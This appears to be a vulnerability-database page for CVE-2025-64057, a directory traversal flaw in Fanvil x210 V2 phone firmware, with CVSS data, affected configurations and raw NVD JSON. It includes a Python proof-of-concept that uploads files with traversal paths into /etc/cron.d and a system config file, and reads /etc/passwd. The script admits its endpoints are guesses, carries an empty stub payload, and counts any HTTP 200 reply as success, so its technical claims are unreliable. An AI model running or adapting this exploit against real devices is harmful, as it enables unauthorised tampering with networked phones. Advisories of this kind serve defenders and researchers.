Security Vulnerability Report
中文
CVE-2025-64057 CVSS 8.3 HIGH

CVE-2025-64057

Published: 2025-12-05 15:15:52
Last Modified: 2026-01-09 02:18:05
Source: [email protected]

Description

Directory traversal vulnerability in Fanvil x210 V2 2.12.20 allows unauthenticated attackers on the local network to store files in arbitrary locations and potentially modify the system configuration or other unspecified impacts.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:fanvil:x210_firmware:2.12.20:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:fanvil:x210:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
Fanvil x210 V2 固件版本 <= 2.12.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64057 PoC - Fanvil x210 V2 Directory Traversal # Affected Version: Fanvil x210 V2 Firmware <= 2.12.20 # CVSS: 3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H (8.3 HIGH) import requests import sys # Target configuration TARGET_IP = "192.168.1.100" # Replace with target device IP TARGET_PORT = 80 TARGET_PATH = "/cgi-bin/cgiFileUpload" # Possible endpoint, adjust based on actual testing def exploit_directory_traversal(): """ Exploit directory traversal vulnerability to write file to arbitrary location """ # Malicious payload with directory traversal sequence traversal_path = "../../../etc/cron.d/malicious_script" # Construct the malicious file content malicious_content = "#!/bin/sh\n# Malicious cron job injected via CVE-2025-64057\n" # Prepare the multipart form data files = { 'file': (traversal_path, malicious_content, 'application/octet-stream'), 'path': (None, '../../../etc/cron.d/', 'text/plain') } # Alternative PoC: Direct file write via configuration import alt_payload = { 'config_file': ( '../../../web/cfg/system.conf', 'malicious_config_data', 'application/octet-stream' ) } print(f"[*] Target: {TARGET_IP}:{TARGET_PORT}") print(f"[*] Exploiting CVE-2025-64057: Directory Traversal in Fanvil x210 V2") try: # Attempt 1: File upload endpoint url1 = f"http://{TARGET_IP}:{TARGET_PORT}{TARGET_PATH}" print(f"[*] Sending payload to: {url1}") response1 = requests.post(url1, files=files, timeout=10) if response1.status_code == 200: print("[+] File write successful - directory traversal confirmed!") return True # Attempt 2: Configuration import url2 = f"http://{TARGET_IP}:{TARGET_PORT}/cgi-bin/config_import" print(f"[*] Trying alternative endpoint: {url2}") response2 = requests.post(url2, files=alt_payload, timeout=10) if response2.status_code == 200: print("[+] Alternative exploit successful!") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False print("[-] Exploit failed - target may not be vulnerable or endpoint differs") return False def verify_vulnerability(): """ Verify if target is vulnerable by reading known file via traversal """ # Read /etc/passwd to verify traversal works read_url = f"http://{TARGET_IP}:{TARGET_PORT}/cgi-bin/cgiFileRead?file=../../../etc/passwd" try: response = requests.get(read_url, timeout=10) if 'root:' in response.text or response.status_code == 200: print("[+] Target is VULNERABLE - directory traversal confirmed") return True except: pass print("[-] Could not verify vulnerability via file read") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-64057 PoC - Fanvil x210 V2 Directory Traversal") print("=" * 60) if len(sys.argv) > 1: TARGET_IP = sys.argv[1] # First verify, then exploit verify_vulnerability() exploit_directory_traversal()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64057", "sourceIdentifier": "[email protected]", "published": "2025-12-05T15:15:51.860", "lastModified": "2026-01-09T02:18:05.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directory traversal vulnerability in Fanvil x210 V2 2.12.20 allows unauthenticated attackers on the local network to store files in arbitrary locations and potentially modify the system configuration or other unspecified impacts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fanvil:x210_firmware:2.12.20:*:*:*:*:*:*:*", "matchCriteriaId": "B5339CEB-DD13-43D9-9DBB-F58EA2EDC47D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:fanvil:x210:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "826351F9-626E-4EA9-9634-9E04B462AF4A"}]}]}], "references": [{"url": "http://fanvil.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64057.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.